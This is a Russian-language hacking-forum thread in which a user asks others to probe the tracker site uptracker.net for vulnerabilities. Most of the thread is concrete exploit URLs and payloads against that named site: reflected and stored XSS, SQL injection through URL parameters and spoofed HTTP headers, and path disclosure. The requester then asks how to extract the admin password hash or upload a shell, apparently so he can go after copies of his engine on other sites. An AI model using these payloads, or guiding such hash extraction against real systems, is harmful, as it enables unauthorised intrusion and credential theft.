Прошу проверить сайт на уязвимости, www.uptracker.net

P.S. Прошу тут выкладывать уязвимости и не ломать.

С меня + сколько смогу...

Всем спасибо

Банально XSS в поиске:
http://www.uptracker.net/search.php?search=%22%3E%3Cscript%3Ealert%28docume nt.cookie%29%3C%2Fscript%3E

Скуль+раскрытие путей
http://www.uptracker.net/userdetails.php?id=723983'

Активная XSS в чате
http://www.uptracker.net/vorbeste.php
<img src='a' onerror='alert()'/>

SQL иньекции


в
1./search.php
2./faq_ru.php
3./index.php
4./recover.php
5./confirm_no_email.php
6./takelanguage.php
7./forums.php
8./login.php
9./userdetails.php
т.д. (дальше не проверял)

которые возникают из-за недостаточной фильтрации следующих полей http запросов:

referer:'
x-forwarded-for:'
client-ip:'

SQL Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '>= first AND <= last' at line 1

XSS в
/recover.php
если в POST запросе значение email передать к примеру
<script>alert(12345)</script>

Раскрытие путей
http://uptracker.net/login.php?returnto[]=x
http://uptracker.net/topten.php?type[]=

404 (ссылка с профиля)
http://uptracker.net/fotogallery.php

SQL-inj (не раскручивал, некоторые, возможно, не представляют опасности, но как минимум - раскрытие путей)
// UPDATE, имхо
http://uptracker.net/details.php?id=-1'
http://uptracker.net/sendmessage.php?receiver=-1'
http://uptracker.net/browse.php?cat=-1'&incldead=1
users.php - любые параметры.

Активная XSS
http://uptracker.net/details.php?id=7614&viewcomm=6693#comm6693
<img src=. onerror=alert()>
------------
В форуме http://uptracker.net/forums.php?action=viewtopic&topicid=3114
<img src=. onerror=alert()>
-----------
http://uptracker.net/musik.php
Уязвимы все поля
-----------
Так же активка в ПМе.
-----------
Активка в профиле - подпись или информация
<img src=. onerror=alert()>

Накрутка рейтинга релиза -
onClick="update_rating(999) - функция не проверяет переданное значение

Пассивная XSS
http://uptracker.net/friends.php?action=add&type=friend&targetid=<script>alert()</script>
http://uptracker.net/forums.php?action=<script>alert()</script>

Спасибо большое за старания, ещё вопрос. Можно ли как нибудь узнать через скуль - хэш админа ? Ну через преведённые ваши скуль иньекции?

Вы меня простите, я в этом не очень...

Спасибо большое за старания, ещё вопрос. Можно ли как нибудь узнать через скуль - хэш админа ? Ну через преведённые ваши скуль иньекции?

Вы меня простите, я в этом не очень...
Через скулю можно узнать не только хэш, при наличии привелегий рута у текушего юзера БД можно читать \ загружать файлы.

BlackSun, можеш привести пример для узнования хэша админа? Через какую- то скулю, или заливка шелла или узнавание пароля дб? Извени за глупый вопрос конечно :( Просто для меня это важно :( Я писал этот движёк с TS обычного, и у меня его украли, ps и сделали на нём другие трекера... Вот хочу посмотреть что можно сделать ...

Пс, если что найдёш скинь в личку пожалуйста..

С меня + и уважение, хотя я тут всех уважаю :)

Спасибо заранее..

[оффтоп]как ты мог его писать,у испанцев каких-то спи3*ил,баннеров еще бы штук 20 нацепил бы[/оффтоп]

по сабжу

пасивная КСС

http://www.uptracker.net/viewrequests.php?category=%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

ПС, для красоты сделал. если не нравится сниму :)

Спасибо за помощь) Если кто ещё может решиться помочь.. пишите